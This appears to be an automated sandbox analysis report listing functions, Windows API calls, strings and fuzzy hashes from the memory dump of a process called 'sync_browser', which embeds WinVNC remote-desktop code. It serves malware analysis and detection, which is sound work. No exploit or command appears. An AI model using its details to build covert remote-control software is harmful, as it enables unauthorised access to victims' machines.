Opcode ID: 8382b389006a9dd66acb90cb8f4aaba53788da99cb30eaf76bcb58c2d1a1b507
Instruction ID: edf025801b8a3389141479cdc983be5a2175b750540006622ca0893af1c66625
Opcode Fuzzy Hash: 8382b389006a9dd66acb90cb8f4aaba53788da99cb30eaf76bcb58c2d1a1b507
Instruction Fuzzy Hash: A9914121B08A42C9FB10FBA5E4146ADB3B1BB447A8F804635DE6D57BE9DE38E505C360

Function 00007FF740028590 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 165
windowsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SendMessageA.USER32 ref: 00007FF7400285FB
WaitForSingleObject.KERNEL32 ref: 00007FF740028608
free.LIBCMT ref: 00007FF740028651
SendMessageA.USER32 ref: 00007FF740028751
free.LIBCMT ref: 00007FF740028763
free.LIBCMT ref: 00007FF740028774
FreeLibrary.KERNEL32 ref: 00007FF7400287B5
DeleteObject.GDI32 ref: 00007FF74002880A
free.LIBCMT ref: 00007FF740028817
DeleteObject.GDI32 ref: 00007FF740028832
free.LIBCMT ref: 00007FF74002883F
DeleteObject.GDI32 ref: 00007FF74002884B
free.LIBCMT ref: 00007FF740028858
DeleteObject.GDI32 ref: 00007FF740028864
free.LIBCMT ref: 00007FF740028871

Strings

vncclient.cpp : deleting socket, xrefs: 00007FF740028666
vncclient.cpp : ~vncClient() executing..., xrefs: 00007FF7400285BA

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
API String ID: 2172171234-2418058073
Opcode ID: 7d6e0222f0b164888ec2c64f76faef887037f09de436063cfbd08819724c29b1
Instruction ID: be7976e512f5a96f671ad88ffdbd7442d84fbba3f74762a3b312e7a30af78046
Opcode Fuzzy Hash: 7d6e0222f0b164888ec2c64f76faef887037f09de436063cfbd08819724c29b1
Instruction Fuzzy Hash: AF81E835A0EA81C5EB64BF61D8547B9A360EF84B94F980135DE1D4B7A9CF39E451C320

Function 00007FF740052FF0 Relevance: 27.2, APIs: 18, Instructions: 183
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF7400B7978: malloc.LIBCMT ref: 00007FF7400B7992

std::exception::exception.LIBCMT ref: 00007FF74005303E
GetWindowLongPtrA.USER32 ref: 00007FF7400530A7
GetDlgItem.USER32 ref: 00007FF7400530F5
SendMessageA.USER32 ref: 00007FF74005310C
SendMessageA.USER32 ref: 00007FF740053127
EndDialog.USER32 ref: 00007FF740053268

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
String ID:
API String ID: 1935883720-0
Opcode ID: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
Instruction ID: 8441d5cf5121afce25809bc6e909273e33dc77c1fb1a93a702b3e4dfea11d779
Opcode Fuzzy Hash: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
Instruction Fuzzy Hash: 29618131B0CA42C2EB10FB65E45477AA3A1EF89BA4F958131DA5D47BA8DF3CE445C360

Function 00007FF7400975C0 Relevance: 25.7, APIs: 17, Instructions: 151
threadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7400975D9
ReleaseSemaphore.KERNEL32 ref: 00007FF740097625
GetLastError.KERNEL32 ref: 00007FF74009764E
LeaveCriticalSection.KERNEL32 ref: 00007FF740097659
TlsAlloc.KERNEL32 ref: 00007FF7400976A4
GetLastError.KERNEL32 ref: 00007FF7400976B5
InitializeCriticalSection.KERNEL32 ref: 00007FF7400976F0
GetCurrentProcess.KERNEL32 ref: 00007FF74009772F
GetCurrentThread.KERNEL32 ref: 00007FF740097738
GetCurrentProcess.KERNEL32 ref: 00007FF740097741
DuplicateHandle.KERNELBASE ref: 00007FF74009776C
GetLastError.KERNEL32 ref: 00007FF740097780
GetCurrentThreadId.KERNEL32 ref: 00007FF74009779C
TlsSetValue.KERNEL32 ref: 00007FF7400977AE
GetLastError.KERNEL32 ref: 00007FF7400977B8

Part of subcall function 00007FF7400C2950: RaiseException.KERNEL32 ref: 00007FF7400C29CB

SetThreadPriority.KERNELBASE ref: 00007FF7400977DA
GetLastError.KERNEL32 ref: 00007FF7400977E4

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
String ID:
API String ID: 772457954-0
Opcode ID: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
Instruction ID: 46bb52ce53ac9750e48f296e7ba1956d8b74037deaa75dbe4b2f1fb9862a79eb
Opcode Fuzzy Hash: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
Instruction Fuzzy Hash: 6F613A36A1CB02C6EB41BF65A844669A7A0FF45B84F904135DA5E43BB9DF3CF449C720

Function 00007FF74001F940 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

sprintf.LIBCMT ref: 00007FF74001F9C7
EnterCriticalSection.KERNEL32 ref: 00007FF74001FA75
LeaveCriticalSection.KERNEL32 ref: 00007FF74001FA9E
SleepEx.KERNELBASE ref: 00007FF74001FAF2
swscanf.LIBCMT ref: 00007FF74001FB87

Strings

vncclient.cpp : m_ms_logon set to %s, xrefs: 00007FF74001FBC4
0.0.0.0, xrefs: 00007FF74001F999
RFB %03d.%03d, xrefs: 00007FF74001F9BB, 00007FF74001FB7B
false, xrefs: 00007FF74001FBB7
true, xrefs: 00007FF74001FBB0
REP, xrefs: 00007FF74001FB2F
i, xrefs: 00007FF74001FA6A
RFB, xrefs: 00007FF74001FB56

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
API String ID: 958158500-3765181313
Opcode ID: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
Instruction ID: 3dac54e41cd15d2bc44ccccbea3f98740b401278ca28d9229d11dcd9dab18399
Opcode Fuzzy Hash: 1bbc69bf7bb785b75e95c5cc589f663b48bba7a26dfe6112371c6df2dcd9451f
Instruction Fuzzy Hash: AB91C06260CB86C6EB60EB15E4587BAB7A4FB84B84F800136DA4E477B8DF3DE445C710

Function 00007FF740069D80 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF740069BC0: LoadLibraryA.KERNEL32 ref: 00007FF740069C03
Part of subcall function 00007FF740069BC0: GetProcAddress.KERNEL32 ref: 00007FF740069C1B
Part of subcall function 00007FF740069BC0: GetProcAddress.KERNEL32 ref: 00007FF740069C2E
Part of subcall function 00007FF740069BC0: GetSystemMetrics.USER32 ref: 00007FF740069C4E
Part of subcall function 00007FF740069BC0: GetCurrentProcessId.KERNEL32 ref: 00007FF740069C61
Part of subcall function 00007FF740069BC0: ProcessIdToSessionId.KERNEL32 ref: 00007FF740069C76
Part of subcall function 00007FF740069BC0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF740069C85
Part of subcall function 00007FF740069BC0: Process32First.KERNEL32 ref: 00007FF740069CA4
Part of subcall function 00007FF740069BC0: CloseHandle.KERNEL32 ref: 00007FF740069CB1
Part of subcall function 00007FF740069BC0: FreeLibrary.KERNEL32 ref: 00007FF740069CBF

OpenProcess.KERNEL32 ref: 00007FF740069DC0
OpenProcessToken.ADVAPI32 ref: 00007FF740069DD6
CloseHandle.KERNEL32 ref: 00007FF740069EBA

Strings

?, xrefs: 00007FF740069E76

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
String ID: ?
API String ID: 2900023865-1684325040
Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
Instruction ID: 92a6fb67eea2d901698e3085b6edc81e328d8079177c6d8898b578d1688fb235
Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
Instruction Fuzzy Hash: F4311C3660DB82C5E760AF21F84436AB7A9FB89784F904035DA8D47B69DF3DE055CB20

Function 00007FF7400280DA Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 189
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF740010270: CreateRectRgn.GDI32 ref: 00007FF74001029D
Part of subcall function 00007FF740010270: CreateRectRgn.GDI32 ref: 00007FF7400102C1
Part of subcall function 00007FF740010270: CreateRectRgn.GDI32 ref: 00007FF7400102E5

Part of subcall function 00007FF7400B92A4: malloc.LIBCMT ref: 00007FF7400B92C7

CreateRectRgn.GDI32 ref: 00007FF7400281F8
LoadLibraryA.KERNEL32 ref: 00007FF740028235
GetProcAddress.KERNEL32 ref: 00007FF740028251

Strings

SendInput, xrefs: 00007FF740028247
USER32, xrefs: 00007FF74002822E
vncclient.cpp : TEST 4, xrefs: 00007FF7400282DF
vncclient.cpp : vncClient() executing..., xrefs: 00007FF740028277

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateRect$AddressLibraryLoadProcmalloc
String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
API String ID: 1369618222-3178290357
Opcode ID: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
Instruction ID: 999dd6d4b719d72252ce9b00570fb7b68718dd5904b076575b986a7ec0b70bd2
Opcode Fuzzy Hash: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
Instruction Fuzzy Hash: 2BB12A32629BD1D6E348DF24EA443DDB7A8F744B44F54422AE3A807BA1CF7A6076C750

Function 00007FF740097B50 Relevance: 10.6, APIs: 7, Instructions: 81
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF740097B61
GetLastError.KERNEL32 ref: 00007FF740097BC9
SetThreadPriority.KERNELBASE ref: 00007FF740097C1D
GetLastError.KERNEL32 ref: 00007FF740097C27
ResumeThread.KERNELBASE ref: 00007FF740097C47
GetLastError.KERNEL32 ref: 00007FF740097C52
LeaveCriticalSection.KERNEL32 ref: 00007FF740097C79

Part of subcall function 00007FF7400C2950: RaiseException.KERNEL32 ref: 00007FF7400C29CB

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
String ID:
API String ID: 1366308849-0
Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
Instruction ID: f2c78a6abd3edc9624f8092e900d09bce478d86422ee2bbb8adc6e1fe31ab503
Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
Instruction Fuzzy Hash: AC313A32A0C642C6EB14BF24E4545A9B3A1FF85754FA00236E69D42BBDDF3CE449CB20

Function 00007FF74006CF90 Relevance: 9.1, APIs: 6, Instructions: 110
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32 ref: 00007FF74006CFDC
setsockopt.WS2_32 ref: 00007FF74006D013
WSAIoctl.WS2_32 ref: 00007FF74006D07E
getsockname.WS2_32 ref: 00007FF74006D0AF
getpeername.WS2_32 ref: 00007FF74006D0DE
SetPerTcpConnectionEStats.IPHLPAPI ref: 00007FF74006D128

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
String ID:
API String ID: 2120259006-0
Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
Instruction ID: 4e51edb8645c5403758dde6fd577ccd6dd74e48cb2ad2ecfe4f7b0487d104321
Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
Instruction Fuzzy Hash: 54513472608B81DEE724DF30D484799B7A4FB4870CF404526EB5C87B58DB78E6A5CB60

Function 00007FF7400C285C Relevance: 9.1, APIs: 6, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_errno.LIBCMT ref: 00007FF7400C2887
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7400C2892
_getptd.LIBCMT ref: 00007FF7400C28B8
CreateThread.KERNELBASE ref: 00007FF7400C290D
GetLastError.KERNEL32 ref: 00007FF7400C2918
free.LIBCMT ref: 00007FF7400C2923

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
String ID:
API String ID: 3283625137-0
Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
Instruction ID: 9e2a2fe87be13c1a77f3cba1880c48f410dc2dfc96ab20e08c5c182d875d8feb
Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
Instruction Fuzzy Hash: 1D216231A0C781C5E658BBA5A5412BAE2A4FF44B90FC44235EE5D03BEACF3CF0518720

Function 00007FF740013FB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 81
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameA.KERNEL32 ref: 00007FF74001409C
LoadLibraryA.KERNELBASE ref: 00007FF7400140D7

Strings

RICHED32.DLL, xrefs: 00007FF7400140D0
Rich Edit Dll Loading, xrefs: 00007FF7400140EA
Unable to load the Rich Edit (RICHED32.DLL) control!, xrefs: 00007FF7400140F1

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ComputerLibraryLoadName
String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
API String ID: 2278097360-3189507618
Opcode ID: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
Instruction ID: 227a250d48bf8559212ab46ba12df050a4d98eb558977c6b195d091cbdca0a0c
Opcode Fuzzy Hash: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
Instruction Fuzzy Hash: 6C317E21B1CB42C1EB98FB6AF45436966A1EB85B44F444138CA4D4B3F9EF3DE445C3A0

Function 00007FF74006A320 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindWindowExA.USER32 ref: 00007FF74006A34F
GetWindowThreadProcessId.USER32 ref: 00007FF74006A36A
GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF74006AB1F,?,?,?,00007FF740027FB2), ref: 00007FF74006A370
PostMessageA.USER32 ref: 00007FF74006A387

Strings

WinVNC Tray Icon, xrefs: 00007FF74006A340

Memory Dump Source

Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true

Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd

Yara matches

Similarity

API ID: ProcessWindow$CurrentFindMessagePostThread
String ID: WinVNC Tray Icon
API String ID: 2660421340-1071638575
Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
Instruction ID: eb40f4663e9a27456a59877e2fa47f196f5405a60a2c2bf91755aa9f2b4d12df
Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
Instruction Fuzzy Hash: 18018F2160CB81C2E704BB52B9440A6F660FF48BD4F944036EE5903B68EE3CE485C710

